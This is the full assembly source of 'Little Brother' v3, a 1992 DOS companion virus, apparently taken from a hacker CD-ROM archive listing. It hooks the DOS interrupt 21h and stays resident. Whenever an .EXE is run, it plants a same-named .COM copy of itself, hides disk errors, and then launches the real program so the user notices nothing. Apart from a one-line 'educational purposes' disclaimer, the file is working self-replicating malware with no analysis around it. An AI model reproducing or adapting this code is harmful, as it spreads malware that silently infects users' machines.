home *** CD-ROM | disk | FTP | other *** search
/ HaCKeRz Kr0nlcKLeZ 1 / HaCKeRz Kr0nlcKLeZ.iso / chibacity / tdupdat2.err / MASUDKHA.ZIP / BROTHER3.ZIP / LTBRO321.ASM < prev   
Encoding:
Assembly Source File  |  1992-10-11  |  8.2 KB  |  257 lines
  1. ;****************************************************************************
  2. ;*  Little Brother    version 3
  3. ;*
  4. ;*  Compile with MASM 4.0
  5. ;*  (other assemblers will probably not produce the same result)
  6. ;*
  7. ;*  Disclaimer:
  8. ;*  This file is only for educational purposes. The author takes no
  9. ;*  responsibility for anything anyone does with this file. Do not
  10. ;*  modify this file!
  11. ;****************************************************************************
  12.  
  13. cseg            segment
  14.                 assume  cs:cseg,ds:cseg,es:nothing
  15.  
  16.                 .RADIX  16
  17.  
  18. FILELEN         equ     end - begin
  19. oi21            equ     end
  20. nameptr         equ     end+4
  21.  
  22.  
  23. ;****************************************************************************
  24. ;*              Install the program!
  25. ;****************************************************************************
  26.  
  27.                 org     100h
  28.  
  29. begin:          cld
  30.                 mov     sp,300
  31.  
  32.                 mov     ax,0044h                ;move program to empty hole
  33.                 mov     es,ax
  34.                 mov     di,0100h
  35.                 mov     si,di
  36.                 mov     cx,FILELEN
  37.         rep     movsb
  38.  
  39.                 mov     ds,cx                   ;get original int21 vector
  40.                 mov     si,0084h
  41.                 mov     di,offset oi21
  42.                 mov     dx,offset ni21
  43.                 lodsw
  44.                 cmp     ax,dx                   ;already installed?
  45.                 je      cancel
  46.                 stosw
  47.                 movsw
  48.  
  49.                 push    es                      ;set vector to new handler
  50.                 pop     ds
  51.                 mov     ax,2521h
  52.                 int     21h
  53.  
  54. cancel:         push    cs                      ;restore segment registers
  55.                 pop     ds
  56.                 push    cs
  57.                 pop     es
  58.  
  59.                 mov     bx,30                   ;free memory
  60.                 mov     ah,4A
  61.                 int     21
  62.  
  63.                 mov     es,ds:[002C]            ;search filename in environment
  64.                 mov     di,0
  65.                 mov     ch,0FFh
  66.                 mov     al,01
  67.         repnz   scasb
  68.                 inc     di
  69.  
  70.                 mov     word ptr [nameptr],di
  71.                 mov     word ptr [nameptr+2],es
  72.                 
  73.                 mov     si,offset EXE_txt       ;change extension to .EXE
  74.                 call    change_ext
  75.  
  76.                 push    cs
  77.                 pop     es
  78.                 mov     bx,offset param         ;make EXEC param. block
  79.                 mov     [bx+4],cs
  80.                 mov     [bx+8],cs
  81.                 mov     [bx+0C],cs
  82.                 lds     dx,dword ptr [nameptr]
  83.                 mov     ax,4B00                 ;execute .EXE program
  84.                 int     21
  85.                 mov     ah,4Dh                  ;ask return code
  86.                 int     21
  87.                 mov     ah,4Ch                  ;exit with same return code
  88.                 int     21
  89.  
  90.  
  91. ;****************************************************************************
  92. ;*              EXEC parameter block
  93. ;****************************************************************************
  94.  
  95. param           dw      0, 80, ?, 5C, ?, 6C, ?
  96.  
  97.  
  98. ;****************************************************************************
  99. ;*              File-extensions
  100. ;****************************************************************************
  101.  
  102. EXE_txt         db      'EXE',0
  103. COM_txt         db      'COM',0
  104.  
  105.  
  106. ;****************************************************************************
  107. ;*              Interupt handler 24
  108. ;****************************************************************************
  109.  
  110. ni24:           mov     al,03
  111.                 iret
  112.  
  113.  
  114. ;****************************************************************************
  115. ;*              Interupt handler 21
  116. ;****************************************************************************
  117.  
  118. ni21:           pushf
  119.                 push    dx
  120.                 push    bx
  121.                 push    ax
  122.                 push    ds
  123.                 push    es
  124.  
  125.                 cmp     ax,4B00h                ;execute ?
  126.                 jne     exit
  127.  
  128. doit:           call    infect
  129.  
  130. exit:           pop     es
  131.                 pop     ds
  132.                 pop     ax
  133.                 pop     bx
  134.                 pop     dx
  135.                 popf
  136.  
  137.                 jmp     dword ptr cs:[oi21]     ;call to old int-handler
  138.  
  139.  
  140. ;****************************************************************************
  141. ;*              Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
  142. ;****************************************************************************
  143.  
  144. infect:         cld
  145.  
  146.                 mov     word ptr cs:[nameptr],dx  ;save the ptr to the filename
  147.                 mov     word ptr cs:[nameptr+2],ds
  148.  
  149.                 push    cs
  150.                 pop     ds
  151.                 call    searchpoint
  152.                 mov     si,offset EXE_txt       ;is extension 'EXE'?
  153.                 mov     cx,3
  154.         rep     cmpsb
  155.                 jnz     return
  156.  
  157.                 mov     si,offset COM_txt       ;change extension to COM
  158.                 call    change_ext
  159.  
  160.                 mov     ax,3300h                ;get ctrl-break flag
  161.                 int     21
  162.                 push    dx
  163.  
  164.                 cwd                             ;clear the flag
  165.                 inc     ax
  166.                 push    ax
  167.                 int     21
  168.  
  169.                 mov     ax,3524h                ;get int24 vector
  170.                 int     21
  171.                 push    bx
  172.                 push    es
  173.  
  174.                 push    cs                      ;set int24 vec to new handler
  175.                 pop     ds
  176.                 mov     dx,offset ni24
  177.                 mov     ah,25h
  178.                 push    ax
  179.                 int     21
  180.  
  181.                 lds     dx,dword ptr [nameptr]  ;create the virus (unique name)
  182.                 xor     cx,cx
  183.                 mov     ah,5Bh
  184.                 int     21
  185.                 jc      return1                 
  186.                 xchg    bx,ax                   ;save handle
  187.  
  188.                 push    cs
  189.                 pop     ds
  190.                 mov     cx,FILELEN              ;write the virus
  191.                 mov     dx,offset begin
  192.                 mov     ah,40h
  193.                 int     21
  194.                 cmp     ax,cx
  195.                 pushf
  196.  
  197.                 mov     ah,3Eh                  ;close the file
  198.                 int     21
  199.  
  200.                 popf
  201.                 jz      return1                 ;all bytes written?
  202.  
  203.                 lds     dx,dword ptr [nameptr]  ;no, delete the virus
  204.                 mov     ah,41h
  205.                 int     21
  206.  
  207. return1:        pop     ax                      ;restore int24 vector
  208.                 pop     ds
  209.                 pop     dx
  210.                 int     21
  211.  
  212.                 pop     ax                      ;restore ctrl-break flag
  213.                 pop     dx
  214.                 int     21
  215.  
  216.                 mov     si,offset EXE_txt       ;change extension to EXE
  217.                 call    change_ext              ;execute .EXE program
  218.  
  219. return:         ret
  220.  
  221.  
  222. ;****************************************************************************
  223. ;*              change the extension of the filename (CS:SI -> ext)
  224. ;****************************************************************************
  225.  
  226. change_ext:     call    searchpoint
  227.                 push    cs
  228.                 pop     ds
  229.                 movsw
  230.                 movsw
  231.                 ret
  232.  
  233.  
  234. ;****************************************************************************
  235. ;*              search begin of extension  
  236. ;****************************************************************************
  237.  
  238. searchpoint:    les     di,dword ptr cs:[nameptr]
  239.                 mov     ch,0FFh
  240.                 mov     al,0
  241.         repnz   scasb
  242.                 sub     di,4
  243.                 ret
  244.  
  245.  
  246. ;****************************************************************************
  247. ;*              Text and Signature
  248. ;****************************************************************************
  249.  
  250.                 db      'Little Brother',0
  251.  
  252. end:
  253.  
  254. cseg            ends
  255.                 end     begin
  256.  
  257.